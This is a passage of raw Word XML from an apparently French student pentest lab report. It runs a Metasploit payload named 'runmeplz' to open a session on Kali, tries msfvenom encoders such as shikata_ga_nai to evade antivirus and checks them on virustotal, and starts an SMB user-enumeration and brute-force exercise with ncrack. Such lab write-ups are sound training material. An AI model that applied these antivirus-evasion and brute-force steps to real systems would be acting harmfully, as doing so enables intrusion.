      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6826F5B5" w14:textId="77777777" w:rsidR="009E31CB" w:rsidRPr="00AB7941" w:rsidRDefault="009E31CB" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="38C347AB" w14:textId="64863FDC" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="004B5BDB">
      <w:r>
        <w:t xml:space="preserve">Lançons maintenant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sur la machine cible avec la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A77CC" w14:textId="77777777" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="188AF8C5" w14:textId="28C0EF70" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="004B5BDB">
      <w:r w:rsidRPr="006215B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CAE7588" wp14:editId="6A4C7EDE">
            <wp:extent cx="5219700" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="331202477"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02477" name="Image 1" descr="Une image contenant texte, Police, capture d’écran, Graphique&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5219700" cy="546100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B92EA" w14:textId="77777777" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="4B7D326E" w14:textId="6D9F1EA6" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="004B5BDB">
      <w:r>
        <w:t>Magnifique, maintenant la session devrait être ouverte de l’autre côté dans notre Kali. Voyons cela grâce à la commande sessions :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01519C58" w14:textId="77777777" w:rsidR="006215B7" w:rsidRDefault="006215B7" w:rsidP="004B5BDB"/>
    <w:p w14:paraId="0DF7B1CB" w14:textId="77777777" w:rsidR="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D0380A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4929A7F5" wp14:editId="1A2BFE21">
            <wp:extent cx="5760720" cy="970280"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="80030597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05977" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="970280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD41B7" w14:textId="3C281074" w:rsidR="006215B7" w:rsidRDefault="00D0380A" w:rsidP="00D0380A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10267C8A" w14:textId="77777777" w:rsidR="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A"/>
    <w:p w14:paraId="07D7FB0D" w14:textId="3C17A3DE" w:rsidR="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A">
      <w:r>
        <w:t xml:space="preserve">Pour commencer l’interaction on peut utiliser la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E17CE1" w14:textId="77777777" w:rsidR="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A"/>
    <w:p w14:paraId="50019EBD" w14:textId="75DABE74" w:rsidR="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Sessions -i NUMSESSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE9355" w14:textId="77777777" w:rsidR="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A"/>
    <w:p w14:paraId="1EF354A6" w14:textId="5F0B15FF" w:rsidR="00D0380A" w:rsidRPr="00D0380A" w:rsidRDefault="00D0380A" w:rsidP="00D0380A">
      <w:r w:rsidRPr="00D0380A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4757BDB0" wp14:editId="03E974B4">
            <wp:extent cx="5760720" cy="701040"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="13924677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67791" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="701040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E3B5D" w14:textId="6B94E034" w:rsidR="00965E2B" w:rsidRPr="00AB7941" w:rsidRDefault="00965E2B" w:rsidP="006215B7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB7941">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="649AA083" w14:textId="77777777" w:rsidR="00FB38CF" w:rsidRPr="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CA027" w14:textId="77777777" w:rsidR="00FB38CF" w:rsidRPr="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Vous pouvez vérifier l'efficacité d'un encodage appliqué à votre binaire sur </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00FB38CF">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>virustotal.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> par exemple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68B47C" w14:textId="77777777" w:rsidR="00FB38CF" w:rsidRPr="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sans encodage (payload brut), combien d'antivirus détecte que votre payload est un </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Trojan</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0DB5B" w14:textId="77777777" w:rsidR="00FB38CF" w:rsidRPr="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A présent appliquez un (ou plusieurs) encodage lors de la génération de votre fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>runmeplz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4BF186" w14:textId="60CEF2F2" w:rsidR="00FB38CF" w:rsidRPr="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>msfvenom --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>encoders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D75BF" w14:textId="23EA7572" w:rsidR="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Nous vous recommandons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> minima l'encodeur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shikata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (option -e de </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). Vérifiez l'efficacité de votre encodage sur </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>virustotal.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. Que constatez-vous ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78998F33" w14:textId="77777777" w:rsidR="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D6BF14" w14:textId="78EFDD73" w:rsidR="00FB38CF" w:rsidRPr="00FB38CF" w:rsidRDefault="00FB38CF" w:rsidP="00FB38CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>C’est bizarre parce que sans encodage, notre logiciel a l’air totalement sûr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6FC99D" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B256D8" w14:textId="77777777" w:rsidR="00CD6ED8" w:rsidRDefault="00FB38CF" w:rsidP="00CD6ED8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00FB38CF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551FDF86" wp14:editId="78D3E749">
            <wp:extent cx="5760720" cy="2891155"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="471938299"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38299" name="Image 1" descr="Une image contenant capture d’écran, texte, logiciel, Logiciel multimédia&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2891155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35689FDE" w14:textId="03FD30BE" w:rsidR="00CD6ED8" w:rsidRDefault="00CD6ED8" w:rsidP="00D8611D">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17E0F0" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Après l’encodage, le payload est encore plus reconnu comme malveillant qu’avant l’encodage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0ECC53" w14:textId="77777777" w:rsidR="00CC5F7D" w:rsidRPr="00CC5F7D" w:rsidRDefault="00CC5F7D" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACE707D" w14:textId="77777777" w:rsidR="00CD6ED8" w:rsidRDefault="00CD6ED8" w:rsidP="00CD6ED8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00CD6ED8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F37F690" wp14:editId="15047237">
            <wp:extent cx="5760720" cy="2940685"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="576527897"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27897" name="Image 1" descr="Une image contenant capture d’écran, texte, logiciel, Logiciel multimédia&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2940685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC00DE8" w14:textId="37540876" w:rsidR="00CD6ED8" w:rsidRDefault="00CD6ED8" w:rsidP="00C648FF">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB4810" w14:textId="77777777" w:rsidR="00CD6ED8" w:rsidRDefault="00CD6ED8" w:rsidP="00CD6ED8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291DADDD" w14:textId="585AD29A" w:rsidR="0016353C" w:rsidRDefault="00E52AA8" w:rsidP="00CC5F7D">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc197957018"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exploit 5 : Scanner (smb_enumusers) et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforc</w:t>
      </w:r>
      <w:r w:rsidR="00875733">
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00875733">
        <w:t> :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="00875733">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11866B35" w14:textId="28472869" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C">
      <w:r>
        <w:t>Pour cet exercice dans les ports où on fait un listen on va ajouter le port 2222 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBCE54" w14:textId="77777777" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C"/>
    <w:p w14:paraId="663D8B88" w14:textId="77777777" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0016353C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9D74D3" wp14:editId="6571ADD8">
            <wp:extent cx="5760720" cy="2735580"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="74500693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06936" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2735580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E82617" w14:textId="5973BF98" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : ajout du port 2222 dans les écoutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550DFFAD" w14:textId="77777777" w:rsidR="0016353C" w:rsidRDefault="0016353C" w:rsidP="0016353C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0129534D" w14:textId="72224A83" w:rsidR="00002FD8" w:rsidRDefault="00002FD8" w:rsidP="00002FD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour la commande à utiliser, au lieu d’utiliser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, on va utiliser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ncrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
